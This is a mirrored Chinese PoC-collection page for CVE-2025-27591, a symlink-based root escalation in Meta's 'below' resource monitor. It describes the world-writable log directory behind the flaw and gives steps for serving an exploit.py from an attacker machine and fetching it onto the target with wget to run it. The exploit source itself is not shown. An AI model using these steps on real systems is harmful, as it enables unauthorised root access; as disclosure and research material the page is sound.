关联漏洞
标题:
below 安全漏洞
(CVE-2025-27591)
描述:below是Meta Incubator开源的一个现代 Linux 系统的资源监视器。 below v0.9.0之前版本存在安全漏洞,该漏洞源于创建了全局可写目录,可能导致通过符号链接攻击提升到root权限。
描述
CVE-2025-27591 is a privilege escalation vulnerability that affected the Below service before version 0.9.0
介绍
# CVE-2025-27591 Proof Of Concept
CVE-2025-27591 is a privilege escalation vulnerability that affected the Below service before version 0.9.0. The issue arose due to the creation of a world-writable directory at /var/log/below. An attacker could exploit this vulnerability by manipulating symlinks within this directory and potentially gain root privileges, making it a significant security concern for local unprivileged users.
This Proof-of-Concept was written for educational and research purposes only.
At the time of writing, no publicly available PoC for this vulnerability existed in the community.Therefore, I decided to responsibly share this implementation in order to fill that gap, contribute tothe security research ecosystem, and raise awareness about the critical nature of insecure filesystem.
## Cause Of Vulnerability
<img width="772" height="245" alt="image" src="https://github.com/user-attachments/assets/220c4bfb-805b-4f2e-98b2-8e7c3cf7142d" />
## Proof-Of-Concept
From attacker machine:
1-git clone https://github.com/BridgerAlderson/CVE-2025-27591-PoC.git
2-cd CVE-2025-27591-PoC
3-python3 -m http.server 80
From vulnerable system:
1- wget http://<your-ip>/exploit.py
2-python exploit.py
<img width="1901" height="678" alt="image" src="https://github.com/user-attachments/assets/049a7102-856b-4bf0-a27a-0a6f70cb8ec7" />
## References
https://www.facebook.com/security/advisories/cve-2025-27591
https://github.com/facebookincubator/below/commit/da9382e6e3e332fd2c3195e22f34977f83f0f1f3
文件快照
[4.0K] /data/pocs/63066c282fd4f59492674053a6b91ef6268b58fa
├── [3.2K] exploit.py
└── [1.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。